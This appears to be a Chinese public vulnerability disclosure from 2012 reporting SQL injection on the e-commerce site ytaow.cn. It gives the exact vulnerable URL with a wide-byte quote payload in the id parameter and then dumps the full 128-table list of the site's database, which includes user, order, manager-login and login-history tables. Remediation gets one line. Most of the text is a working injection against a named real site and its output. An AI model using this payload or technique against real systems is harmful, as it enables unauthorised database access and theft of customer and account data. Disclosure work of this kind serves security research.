2012-11-08: 积极联系厂商并且等待厂商认领中,细节不对外公开 2012-12-23: 厂商已经主动忽略漏洞,细节向公众公开
移淘商城sql注入
http://ytaow.cn/index.php?id=15881%A1%AF&from_id=40951没有做任何sql过滤导致sql注入漏洞,电商的安全性应该要求更高些吧。
Database: xinw[128 tables]+---------------------------------------+| access_log_all || access_log_all_add_host || access_log_all_channel || access_log_all_from || access_log_all_from_uv || access_log_all_site || activity2gift || activity2level || activity2member || activity2product || channel || channel_site || coupon || ext_content || ext_content_detail || ext_content_easou || ext_content_frame || ext_content_frame2 || ext_content_frame_published || ext_content_shadow || ext_content_show || ext_content_tag || ext_content_view_count || ext_content_web || frame_product_num || guess_like_config || igou_article || igou_brand || igou_channel || igou_channel_group || igou_comments || igou_site || igou_site_history || igou_user || igou_user_comment || luxury || manager_login_gateway || miaosha_page || modx_active_users || modx_categories || modx_document_groups || modx_documentgroup_names || modx_event_log || modx_keyword_xref || modx_manager_log || modx_manager_users || modx_member_groups || modx_membergroup_access || modx_membergroup_names || modx_site_content || modx_site_content_copy || modx_site_content_copy4 || modx_site_content_copy5 || modx_site_content_metatags || modx_site_htmlsnippets || modx_site_htmlsnippets_copy || modx_site_htmlsnippets_copy1 || modx_site_keywords || modx_site_metatags || modx_site_module_access || modx_site_module_depobj || modx_site_modules || modx_site_plugin_events || modx_site_plugins || modx_site_snippets || modx_site_templates || modx_site_tmplvar_access || modx_site_tmplvar_contentvalues || modx_site_tmplvar_contentvalues_copy2 || modx_site_tmplvar_templates || modx_site_tmplvars || modx_system_eventnames || modx_system_settings || modx_user_attributes || modx_user_messages || modx_user_messages_0809 || modx_user_roles || modx_user_settings || modx_web_groups || modx_web_user_attributes || modx_web_user_settings || modx_web_users || modx_webgroup_access || modx_webgroup_names || order || order_product || order_rand_code || page_target || page_target_3g || phone_list || sell_amount_page || sold_out_detail || tuangou_count || union_channel_page_id || v_content_price || v_content_sell_count || v_content_view_count || v_frame || v_frame_hot || v_group_module || v_order_detail || v_order_status || v_sale_order || v_tmpvar || v_tmpvar_pagetitle || v_tmpvar_price || v_tmpvar_price_new || v_tmpvar_product || v_user_group || variant_other_buy || xinw_elements || xinw_express_form || xinw_gift || xinw_gift2page || xinw_gift2product || xinw_gift_content || xinw_gift_extend_content || xinw_key || xinw_key_enum || xinw_login_history || xinw_popup || xinw_role2element || xinw_role2key || xinw_role2key_not_view || xinw_storage_product || xinw_warehouse_log || ytao_article || ytao_user_comment |+---------------------------------------+
不要使用直接查询方式
未能联系到厂商或者厂商积极拒绝
